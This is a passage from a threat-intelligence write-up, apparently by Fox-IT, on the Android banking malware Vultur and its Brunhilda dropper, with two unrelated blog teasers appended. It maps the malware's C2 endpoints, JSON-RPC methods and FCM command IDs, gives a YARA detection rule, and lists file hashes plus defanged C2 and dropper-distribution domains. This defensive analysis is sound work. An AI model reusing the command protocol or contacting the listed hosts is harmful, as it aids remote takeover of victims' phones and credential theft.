FCM commands implemented in Vultur payload #3. The last Vultur payload does not contain its own Accessibility Service, but it can interact with the Accessibility Service that is implemented in payload #2. C2 Communication: Vultur finds its voice When Vultur infects a device, it initiates a series of communications with its designated C2 server. Communications related to C2 methods such as application.register and vnc.blocked.packages occur using JSON-RPC 2.0 over HTTPS. These requests are sent from the infected device to the C2 server to either provide or receive information. Actual vultures lack a voice box; their vocalisations include rasping hisses and grunts [4]. 
While the communication in older variants of Vultur may have sounded somewhat similar to that, you could say that the threat actors have developed a voice box for the latest version of Vultur. The content of the aforementioned requests is now AES encrypted and Base64 encoded, just like the server response. Next to encrypted communication over HTTPS, the bot can receive commands via Firebase Cloud Messaging (FCM). FCM is a cross-platform messaging solution provided by Google. The FCM related commands are sent from the C2 server to the infected device to perform actions on it. During our investigation of the latest Vultur variant, we identified the C2 endpoints listed below.
  • /ejr/ : Endpoint for C2 communication using JSON-RPC 2.0.
    Note: in older versions of Vultur the /rpc/ endpoint was used for similar communication.
  • /upload/ : Endpoint for uploading files (such as screen recording results).
  • /version/app/?filename=ngrok&arch={DEVICE_ARCH} : Endpoint for downloading the relevant version of ngrok.
  • /version/app/?filename={FILENAME} : Endpoint for downloading a file specified by the payload (related to the new file manager functionality).
C2 methods in Brunhilda dropper
The commands below are sent from the infected device to the C2 server to either provide or receive information.
  • application.register: Registers the bot by providing the malware package name and information about the device: model, country, installed apps, Android version. It also sends a tag that is used for identifying the dropper campaign name.
    Note: this method is also used once in Vultur payload #1, but without sending a tag. This method then returns a token to be used in further communication with the C2 server.
  • application.state: Sends a token value that was set as a response to the application.register command, together with a status code of "3".
C2 methods in Vultur
The commands below are sent from the infected device to the C2 server to either provide or receive information.
  • vnc.register (UPDATED): Registers the bot by providing the FCM token, malware package name and information about the device, model, country, Android version. This method has been updated in the latest version of Vultur to also include information on whether the infected device is rooted and if it is detected as an emulator.
  • vnc.status (UPDATED): Sends the following status information about the device: if the Accessibility Service is enabled, if the Device Admin permissions are enabled, if the screen is locked, what the VNC address is. This method has been updated in the latest version of Vultur to also send information related to: active fingerprints on the device, screen resolution, time, battery percentage, network operator, location.
  • vnc.apps: Sends the list of apps that are installed on the victim’s device.
  • vnc.keylog: Sends the keystrokes that were obtained via keylogging.
  • vnc.config (UPDATED): Obtains the config of the malware, such as the list of targeted applications by the keylogger and VNC. This method has been updated in the latest version of Vultur to also obtain values related to the following new keys: “packages2”, “rurl”, “recording”, “main_content”, “tvmq”.
  • vnc.overlay: Obtains the HTML code for overlay injections of a specified package name using the pkg parameter. It is still unclear whether support for overlay injections is fully implemented in Vultur.
  • vnc.overlay.logs: Sends the stolen credentials that were obtained via HTML overlay injections. It is still unclear whether support for overlay injections is fully implemented in Vultur.
  • vnc.pattern (NEW): Informs the C2 server whether a PIN pattern was successfully extracted and stored in the application’s Shared Preferences.
  • vnc.snapshot (NEW): Sends JSON data to the C2 server, which can contain:

1. Information about the accessibility event’s class, bounds, child nodes, UUID, event type, package name, text content, screen dimensions, time of the event, and if the screen is locked.
2. Recently copied text, and SharedPreferences values related to “overlay” and “keyboard”.
3. X and Y coordinates related to a click.
  • vnc.submit (NEW): Informs the C2 server whether the bot registration was successfully submitted or if it failed.
  • vnc.urls (NEW): Informs the C2 server about the URL bar related element IDs of either the Google Chrome or Firefox web browser (depending on which application triggered the accessibility event).
  • vnc.blocked.packages (NEW): Retrieves a list of “blocked packages” from the C2 server and stores them together with custom HTML code in the application’s Shared Preferences. When one of these package names is detected as running on the victim device, the malware will automatically press the back button and display custom HTML content if available. If unavailable, a default “Temporarily Unavailable” message is displayed.
  • vnc.fm (NEW): Sends file related information to the C2 server. File manager functionality includes downloading, uploading, installing, deleting, and finding of files.
  • vnc.syslog: Sends logs.
  • crash.logs: Sends logs of all content on the screen.
  • installer.config (NEW): Retrieves the HTML code that is displayed in a WebView of the first Vultur payload. This HTML code contains instructions to enable Accessibility Services permissions.
FCM commands in Vultur
The commands below are sent from the C2 server to the infected device via Firebase Cloud Messaging in order to perform actions on the infected device. The new commands use IDs instead of names that describe their functionality. These command IDs are the same in different samples.
  • registered: Received when the bot has been successfully registered.
  • start: Starts the VNC connection using ngrok.
  • stop: Stops the VNC connection by killing the ngrok process and stopping the VNC service.
  • unlock: Unlocks the screen.
  • delete: Uninstalls the malware package.
  • pattern: Provides a gesture/stroke pattern to interact with the device’s screen.
  • 109b0e16 (NEW): Presses the back button.
  • 18cb31d4 (NEW): Presses the home button.
  • 811c5170 (NEW): Shows the overview of recently opened apps.
  • d6f665bf (NEW): Starts an app specified by the payload.
  • 1b05d6ee (NEW): Shows a black view.
  • 1b05d6da (NEW): Shows a black view that is obtained from the layout resources in Vultur payload #2.
  • 7f289af9 (NEW): Shows a WebView with HTML code loaded from SharedPreference key “946b7e8e”.
  • dc55afc8 (NEW): Removes the active black view / WebView that was added from previous commands (after sleeping for 15 seconds).
  • cbd534b9 (NEW): Removes the active black view / WebView that was added from previous commands (without sleeping).
  • 4bacb3d6 (NEW): Deletes an app specified by the payload.
  • b9f92adb (NEW): Navigates to the settings of an app specified by the payload.
  • 77b58a53 (NEW): Ensures that the device stays on by acquiring a wake lock, disables keyguard, sleeps for 0.1 second, and then swipes up to unlock the device without requiring a PIN.
  • ed346347 (NEW): Performs a click.
  • 5c900684 (NEW): Scrolls forward.
  • d98179a8 (NEW): Scrolls backward.
  • 7994ceca (NEW): Sets the text of a specified element ID to the payload text.
  • feba1943 (NEW): Swipes up.
  • d403ad43 (NEW): Swipes down.
  • 4510a904 (NEW): Swipes left.
  • 753c4fa0 (NEW): Swipes right.
  • b183a400 (NEW): Performs a stroke pattern on an element across a 3×3 grid.
  • 81d9d725 (NEW): Performs a stroke pattern based on x+y coordinates and time duration.
  • b79c4b56 (NEW): Press-and-hold 3 times near bottom middle of the screen.
  • 1a7493e7 (NEW): Starts capturing (recording) the screen.
  • 6fa8a395 (NEW): Sets the “ShowMode” of the keyboard to 0. This allows the system to control when the soft keyboard is displayed.
  • 9b22cbb1 (NEW): Sets the “ShowMode” of the keyboard to 1.
    This means the soft keyboard will never be displayed (until it is turned back on).
  • 98c97da9 (NEW): Requests permissions for reading and writing external storage.
  • 7b230a3b (NEW): Requests permissions to install apps from unknown sources.
  • cc8397d4 (NEW): Opens the long-press power menu.
  • 3263f7d4 (NEW): Sets a SharedPreference value for the key “c0ee5ba1-83dd-49c8-8212-4cfd79e479c0” to the specified payload. This value is later checked in order to determine whether the long-press power menu should be displayed (SharedPref value 1), or whether the back button must be pressed (SharedPref value 2).
  • request_accessibility (UPDATED): Prompts the infected device with either a notification or a custom WebView that instructs the user to enable accessibility services for the malicious app. The related WebView component was not present in older versions of Vultur.
  • announcement (NEW): Updates the value for the C2 domain in the SharedPreferences.
  • 5283d36d-e3aa-45ed-a6fb-2abacf43d29c (NEW): Sends a POST with the vnc.config C2 method and stores the malware config in SharedPreferences.
  • 09defc05-701a-4aa3-bdd2-e74684a61624 (NEW): Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2, and displays a black view.
  • fc7a0ee7-6604-495d-ba6c-f9c2b55de688 (NEW): Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2, and displays a custom WebView with HTML code loaded from SharedPreference key “946b7e8e” (“tvmq” value from malware config).
  • 8eac269d-2e7e-4f0d-b9ab-6559d401308d (NEW): Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2.
  • e7289335-7b80-4d83-863a-5b881fd0543d (NEW): Enables the keyboard and unmutes audio. Then, sends the vnc.snapshot method with empty JSON data.
  • 544a9f82-c267-44f8-bff5-0726068f349d (NEW): Retrieves the C2 command, payload and UUID, and executes the command in a thread.
  • a7bfcfaf-de77-4f88-8bc8-da634dfb1d5a (NEW): Creates a custom notification to be shown in the status bar.
  • 444c0a8a-6041-4264-959b-1a97d6a92b86 (NEW): Retrieves the list of apps to block and corresponding HTML code through the vnc.blocked.packages C2 method and stores them in the blocked_package_template SharedPreference key.
  • a1f2e3c6-9cf8-4a7e-b1e0-2c5a342f92d6 (NEW): Executes a file manager related command. Commands are:

1. 91b4a535-1a78-4655-90d1-a3dcb0f6388a – Downloads a file
2. cf2f3a6e-31fc-4479-bb70-78ceeec0a9f8 – Uploads a file
3. 1ce26f13-fba4-48b6-be24-ddc683910da3 – Deletes a file
4. 952c83bd-5dfb-44f6-a034-167901990824 – Installs a file
  5. 787e662d-cb6a-4e64-a76a-ccaf29b9d7ac – Finds files containing a specified pattern
Detection
Writing YARA rules to detect Android malware can be challenging, as APK files are ZIP archives. This means that extracting all of the information about the Android application would involve decompressing the ZIP, parsing the XML, and so on. Thus, most analysts build YARA rules for the DEX file. However, DEX files, such as Vultur payload #3, are less frequently submitted to VirusTotal as they are uncovered at a later stage in the infection chain. To maximise our sample pool, we decided to develop a YARA rule for the Brunhilda dropper. We discovered some unique hex patterns in the dropper APK, which allowed us to create the YARA rule below.
rule brunhilda_dropper
{
    meta:
        author = "Fox-IT, part of NCC Group"
        description = "Detects unique hex patterns observed in Brunhilda dropper samples."
        target_entity = "file"
    strings:
        $zip_head = "PK"
        $manifest = "AndroidManifest.xml"
        $hex1 = {63 59 5c 28 4b 5f}
        $hex2 = {32 4a 66 48 66 76 64 6f 49 36}
        $hex3 = {63 59 5c 28 4b 5f}
        $hex4 = {30 34 7b 24 24 4b}
        $hex5 = {22 69 4f 5a 6f 3a}
    condition:
        $zip_head at 0 and $manifest and #manifest >= 2 and 2 of ($hex*)
}
Wrap-up
Vultur’s recent developments have shown a shift in focus towards maximising remote control over infected devices. With the capability to issue commands for scrolling, swipe gestures, clicks, volume control, blocking apps from running, and even incorporating file manager functionality, it is clear that the primary objective is to gain total control over compromised devices. Vultur has a strong correlation to Brunhilda, with its C2 communication and payload decryption having the same implementation in the latest variants. This indicates that both the dropper and Vultur are being developed by the same threat actors, as has also been uncovered in the past. Furthermore, masquerading malicious activity through the modification of legitimate applications, encryption of traffic, and the distribution of functions across multiple payloads decrypted from native code shows that the actors put more effort into evading detection and complicating analysis. During our investigation of recently submitted Vultur samples, we observed new functionality being added in quick succession. This suggests ongoing and active development to enhance the malware’s capabilities. In light of these observations, we expect more functionality to be added to Vultur in the near future.
Indicators of Compromise
Analysed samples (package name / SHA-256 file hash / description):
  • com.wsandroid.suite / edef007f1ca60fdf75a7d5c5ffe09f1fc3fb560153633ec18c5ddb46cc75ea21 / Brunhilda Dropper
  • com.medical.balance / 89625cf2caed9028b41121c4589d9e35fa7981a2381aa293d4979b36cf5c8ff2 / Vultur payload #1
  • com.medical.balance / 1fc81b03703d64339d1417a079720bf0480fece3d017c303d88d18c70c7aabc3 / Vultur payload #2
  • com.medical.balance / 4fed4a42aadea8b3e937856318f9fbd056e2f46c19a6316df0660921dd5ba6c5 / Vultur payload #3
  • com.wsandroid.suite / 001fd4af41df8883957c515703e9b6b08e36fde3fd1d127b283ee75a32d575fc / Brunhilda Dropper
  • se.accessibility.app / fc8c69bddd40a24d6d28fbf0c0d43a1a57067b19e6c3cc07e2664ef4879c221b / Vultur payload #1
  • se.accessibility.app / 7337a79d832a57531b20b09c2fc17b4257a6d4e93fcaeb961eb7c6a95b071a06 / Vultur payload #2
  • se.accessibility.app / 7f1a344d8141e75c69a3c5cf61197f1d4b5038053fd777a68589ecdb29168e0c / Vultur payload #3
  • com.wsandroid.suite / 26f9e19c2a82d2ed4d940c2ec535ff2aba8583ae3867502899a7790fe3628400 / Brunhilda Dropper
  • com.exvpn.fastvpn / 2a97ed20f1ae2ea5ef2b162d61279b2f9b68eba7cf27920e2a82a115fd68e31f / Vultur payload #1
  • com.exvpn.fastvpn / c0f3cb3d837d39aa3abccada0b4ecdb840621a8539519c104b27e2a646d7d50d / Vultur payload #2
  • com.wsandroid.suite / 92af567452ecd02e48a2ebc762a318ce526ab28e192e89407cac9df3c317e78d / Brunhilda Dropper
  • jk.powder.tendence / fa6111216966a98561a2af9e4ac97db036bcd551635be5b230995faad40b7607 / Vultur payload #1
  • jk.powder.tendence / dc4f24f07d99e4e34d1f50de0535f88ea52cc62bfb520452bdd730b94d6d8c0e / Vultur payload #2
  • jk.powder.tendence / 627529bb010b98511cfa1ad1aaa08760b158f4733e2bbccfd54050838c7b7fa3 / Vultur payload #3
  • com.wsandroid.suite / f5ce27a49eaf59292f11af07851383e7d721a4d60019f3aceb8ca914259056af / Brunhilda Dropper
  • se.talkback.app / 5d86c9afd1d33e4affa9ba61225aded26ecaeb01755eeb861bb4db9bbb39191c / Vultur payload #1
  • se.talkback.app / 5724589c46f3e469dc9f048e1e2601b8d7d1bafcc54e3d9460bc0adeeada022d / Vultur payload #2
  • se.talkback.app / 7f1a344d8141e75c69a3c5cf61197f1d4b5038053fd777a68589ecdb29168e0c / Vultur payload #3
  • com.wsandroid.suite / fd3b36455e58ba3531e8cce0326cce782723cc5d1cc0998b775e07e6c2622160 / Brunhilda Dropper
  • com.adajio.storm / 819044d01e8726a47fc5970efc80ceddea0ac9bf7c1c5d08b293f0ae571369a9 / Vultur payload #1
  • com.adajio.storm / 0f2f8adce0f1e1971cba5851e383846b68e5504679d916d7dad10133cc965851 / Vultur payload #2
  • com.adajio.storm / fb1e68ee3509993d0fe767b0372752d2fec8f5b0bf03d5c10a30b042a830ae1a / Vultur payload #3
  • com.protectionguard.app / d3dc4e22611ed20d700b6dd292ffddbc595c42453f18879f2ae4693a4d4d925a / Brunhilda Dropper (old variant)
  • com.appsmastersafey / f4d7e9ec4eda034c29b8d73d479084658858f56e67909c2ffedf9223d7ca9bd2 / Vultur (old variant)
  • com.datasafeaccountsanddata.club / 7ca6989ccfb0ad0571aef7b263125410a5037976f41e17ee7c022097f827bd74 / Vultur (old variant)
  • com.app.freeguarding.twofactor / c646c8e6a632e23a9c2e60590f012c7b5cb40340194cb0a597161676961b4de0 / Vultur (old variant)
Note: Vultur payloads #1 and #2 related to Brunhilda dropper 26f9e19c2a82d2ed4d940c2ec535ff2aba8583ae3867502899a7790fe3628400 are the same as Vultur payloads #2 and #3 in the latest variants. The dropper in this case only drops two payloads, where the latest versions deploy a total of three payloads.
C2 servers
  • safetyfactor[.]online
  • cloudmiracle[.]store
  • flandria171[.]appspot[.]com (FCM)
  • newyan-1e09d[.]appspot[.]com (FCM)
Dropper distribution URLs
  • mcafee[.]960232[.]com
  • mcafee[.]353934[.]com
  • mcafee[.]908713[.]com
  • mcafee[.]784503[.]com
  • mcafee[.]053105[.]com
  • mcafee[.]092877[.]com
  • mcafee[.]582630[.]com
  • mcafee[.]581574[.]com
  • mcafee[.]582342[.]com
  • mcafee[.]593942[.]com
  • mcafee[.]930204[.]com
References
  1. https://resources.prodaft.com/brunhilda-daas-malware-report
  2. https://www.threatfabric.com/blogs/vultur-v-for-vnc
  3. https://www.threatfabric.com/blogs/the-attack-of-the-droppers
  4. https://www.wildlifecenter.org/vulture-facts
Categorías: Security Posts

Cybersecurity Concerns for Ancillary Strength Control Subsystems

BreakingPoint Labs Blog - Jue, 2023/10/19 - 19:08
Additive manufacturing (AM) engineers have been incredibly creative in developing ancillary systems that modify a printed part’s mechanical properties. These systems mostly focus on the issue of anisotropic properties of additively built components. This blog post is a good reference if you are unfamiliar with isotropic vs. anisotropic properties and how they impact 3D printing. […] The post Cybersecurity Concerns for Ancillary Strength Control Subsystems appeared first on BreakPoint Labs - Blog.
Categorías: Security Posts

Update on Naked Security

Naked Security Sophos - Mar, 2023/09/26 - 12:00
To consolidate all of our security intelligence and news in one location, we have migrated Naked Security to the Sophos News platform.
Categorías: Security Posts
Distribuir contenido